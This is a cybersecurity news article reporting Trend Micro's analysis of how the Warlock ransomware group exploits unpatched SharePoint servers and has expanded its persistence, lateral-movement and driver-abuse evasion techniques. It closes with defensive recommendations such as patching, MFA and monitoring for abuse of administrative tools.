Warlock Ransomware Group Augments Post-Exploitation Activities

THREAT INTELLIGENCE CYBERATTACKS & DATA BREACHES VULNERABILITIES & THREATS CYBER RISK NEWS Warlock Ransomware Group Augments Post-Exploitation Activities In a recent attack, the group showcased stealthier cross-network activity, thanks to its use of a new BYOVD technique and other tools. Elizabeth Montalbano,Contributing Writer March 17, 2026 4 Min Read SOURCE: TITHI LUADTHONG VIA ALAMY STOCK PHOTO The Warlock ransomware group continues to exploit unpatched Microsoft SharePoint servers with a new focus on stealthier, more resilient post-exploitation activity, thanks to its use of a new bring your own vulnerable driver (BYOVD) technique and other strategic tools. Warlock, also tracked as Water Manaul, has maintained a consistency in its initial access method in attacks during the second half of last year, during which it primarily targeted the technology, manufacturing, and government sectors in the US, Germany, and Russia, according to researchers at Trend Micro. In activity observed earlier this year, the group pivoted to expanding its malicious activities once inside a targeted environment, according to a report published this week. "Our recent monitoring revealed that the Warlock ransomware group has enhanced its attack chain, including improved methods for persistence, lateral movement, and evasion," Trend Micro threat analysts wrote in the report. Related:China-Nexus Hackers Skulk in Southeast Asian Military Orgs for Years These methods include exploiting the Nsec driver with a new BYOVD technique as well as using the remote-access tool TightVNC and the reverse-proxy tool Yuze to conceal its malicious activity as it spreads across networks, the researchers said. These tactics are in addition to previous post-exploit tools and techniques used by the group, which included the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework, a single Cloudflare tunnel for remote access, and Rclone disguised as TrendSecurity.exe for exfiltration.  The researchers noted that the expanded toolset "gives Warlock multiple redundant [C2] channels that blend with legitimate network traffic, demonstrating deliberate investment in operational resilience and detection evasion." Rapid Evolution of a Nascent Group Warlock hasn't been around very long on the ransomware scene but seems to be evolving rapidly in a short time frame, according to Trend Micro. The group made its public debut last June on the Russian cybercrime forum RAMP. It quickly took credit for more than a dozen attacks, snagging victims such as government agencies across multiple countries, as well as private sector organizations. Trend Micro researchers observed a Warlock attack in early January during which the threat actors spent 15 days inside a victim's network before executing the ransomware. The investigation tracked the earliest observed malicious activity of Warlock on the network to the SharePoint worker process (w3wp.exe) on the compromised server, suggesting that the group is continuing to exploit unpatched Microsoft SharePoint vulnerabilities on Internet-facing servers as its primary access point.  Related:Inside Olympic Cybersecurity: Lessons From Paris 2024 to Milan Cortina 2026 Indeed, last year Trend Micro observed Warlock exploiting SharePoint vulnerabilities, including a set of flaws affecting on-premises servers — spoofing flaw CVE-2025-49706, remote code execution bug CVE-2025-49704, and related vulnerabilities CVE-2025-53770 and CVE-2025-53771. While Warlock's post-compromise tradecraft is evolving, its initial access approach remains unchanged, which reinforces the ongoing risk posed when organizations delay patching of public-facing enterprise applications. Warlock's Post-Exploitation Activity Enhancements In the Warlock attack Trend Micro detected in January, the threat actors began to deviate from techniques seen in previous attacks to improve persistence, lateral movement, and defense evasion, according to Trend Micro. Key changes observed include silently deploying TightVNC as a Windows service via PsExec for persistent GUI-based remote access. Later in the attack, Warlock also deployed Yuze, a lightweight C-based open source reverse proxy tool used to establish SOCKS5 connections over ports 80, 443, and 53. This helps blend malicious traffic with normal network activity to help attackers evade detection. Related:Attackers Abuse LiveChat to Phish Credit Card, Personal Data The group also leveraged the BYOVD technique by exploiting a vulnerability in the NSecKrnl.sys driver to terminate security products at the kernel level, replacing the googleApiUtil64.sys driver used in earlier campaigns. This represents "a more advanced evolution of earlier driver abuse," the researchers noted. These additions complement existing tactics such as Cloudflare tunnels for C2 and Rclone for data exfiltration, forming a layered and redundant attack chain designed to survive disruption, according to Trend Micro. Defending Against Warlock Given the rapid progress of even fledgling groups such as Warlock, defenders should respond directly to their malicious activities, the researchers said. They emphasized once again the need to patch immediately any public vulnerabilities, particularly in widely used enterprise server technology such as SharePoint. "Protecting these assets and the credentials they hold is critical to preventing initial access and in impeding post-exploitation activities, such as privilege escalation and domain dominance," the researchers noted. In addition to patching, defenders can protect SharePoint and other Internet-facing assets by removing direct RDP or administrative interface exposure to the Internet and enforcing multifactor authentication (MFA) on all external access points, especially VPNs and email systems, they added. Trend Micro also advised organizations should actively monitor for abuse of legitimate administrative and remote access tools, set up detections for anomalous driver activity and kernel-level tampering, and practice consistent visibility into lateral movement and proxy-based C2 channels to defend specifically against the tactics observed in the recent Warlock attack. About the Author Elizabeth Montalbano Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report Cybersecurity Forecast 2026 The ROI of AI in Security ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like THREAT INTELLIGENCE Red Hat Hackers Team Up With Scattered Lapsus$ Hunters by Rob Wright OCT 08, 2025 THREAT INTELLIGENCE 45 New Domains Linked to Salt Typhoon, UNC4841 by Elizabeth Montalbano, Contributing Writer SEP 08, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 THREAT INTELLIGENCE Chinese APTs Exploit EDR 'Visibility Gap' for Cyber Espionage by Becky Bracken, Senior Editor, Dark Reading APR 14, 2025 Editor's Choice CYBERSECURITY OPERATIONS Why Stryker's Outage Is a Disaster Recovery Wake-Up Call byJai Vijayan MAR 12, 2026 5 MIN READ APPLICATION SECURITY Microsoft Patches 83 CVEs in March Update byJai Vijayan MAR 11, 2026 4 MIN READ THREAT INTELLIGENCE Commercial Spyware Opponents Fear US Policy Shifting byRob Wright MAR 12, 2026 9 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Autonomous Pentesting at Machine Speed, Without False Positives Fixing Organizations' Identity Security Posture Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE